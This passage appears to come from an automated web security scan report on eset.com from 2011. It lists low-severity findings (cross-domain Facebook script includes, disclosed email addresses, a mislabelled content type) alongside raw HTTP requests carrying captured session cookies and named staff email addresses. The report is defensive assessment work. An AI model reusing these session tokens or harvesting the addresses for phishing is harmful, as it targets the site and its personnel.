Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18133
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168662
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>I
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.14. http://www.eset.com/us/home/compare-eset-to-competition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/compare-eset-to-competition

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/home/compare-eset-to-competition HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24600
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168699
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.15. http://www.eset.com/us/home/nod32-antivirus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/nod32-antivirus

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/home/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25430
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168734
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>N
...[SNIP]...
<div style="padding:3px 0 20px 0">
                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.16. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25519
Date: Sun, 17 Apr 2011 14:15:41 GMT
X-Varnish: 1858168757
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div style="padding:3px 0 20px 0">
   <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.17. http://www.eset.com/us/online-scanner  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/online-scanner

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/online-scanner HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=cactk8q566m5g6gpieoat7p2l0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20674
Date: Sun, 17 Apr 2011 12:54:47 GMT
X-Varnish: 1857985694
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
<div id="sub_banner_cell" style="text-align:right; margin-right:20px; height:30px; padding-top:20px">
   <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.18. http://www.eset.com/us/partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13815
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168825
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.19. http://www.eset.com/us/partners/worldwide-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners/worldwide-partners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/partners/worldwide-partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24085
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168828
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.20. http://www.eset.com/us/press-center  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/press-center

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/press-center HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18326
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168837
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.21. http://www.eset.com/us/renew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/renew

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/renew HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18934
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168913
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>R
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.22. http://www.eset.com/us/rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/rss

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/rss HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 15138
Date: Sun, 17 Apr 2011 14:15:44 GMT
X-Varnish: 1858168966
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.23. http://www.eset.com/us/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/sitemap

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/sitemap HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18912
Date: Sun, 17 Apr 2011 14:15:44 GMT
X-Varnish: 1858169006
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

6.24. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Sun, 17 Apr 2011 14:15:45 GMT
X-Varnish: 1858169089
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.eset.com/us/company/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/contact

Issue detail

The following email addresses were disclosed in the response:

Request

GET /us/company/contact HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 19260
Date: Sun, 17 Apr 2011 14:15:37 GMT
X-Varnish: 1858168134
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>C
...[SNIP]...
<a href="mailto:cdale@eset.com">cdale@eset.com</a>
...[SNIP]...
<a href="mailto:mcjannet@eset.com">mcjannet@eset.com</a>
...[SNIP]...
<a href="mailto:samples@eset.com">
...[SNIP]...
<a href="mailto:asia@eset.com">asia@eset.com</a>
...[SNIP]...

7.2. http://www.eset.com/us/company/privacy-policy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/company/privacy-policy

Issue detail

The following email address was disclosed in the response:

Request

GET /us/company/privacy-policy HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25601
Date: Sun, 17 Apr 2011 14:15:37 GMT
X-Varnish: 1858168183
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<a href="mailto:privacy@eset.com">privacy@eset.com</a>
...[SNIP]...

7.3. http://www.eset.com/us/renew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/renew

Issue detail

The following email address was disclosed in the response:

Request

GET /us/renew HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18934
Date: Sun, 17 Apr 2011 14:15:43 GMT
X-Varnish: 1858168913
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>R
...[SNIP]...
<br />
someone@somewhere.com
</span>
...[SNIP]...

8. Content type incorrectly stated  previous
There are 8 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


8.1. http://www.eset.com/us/scripts/business.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/business.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/business.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
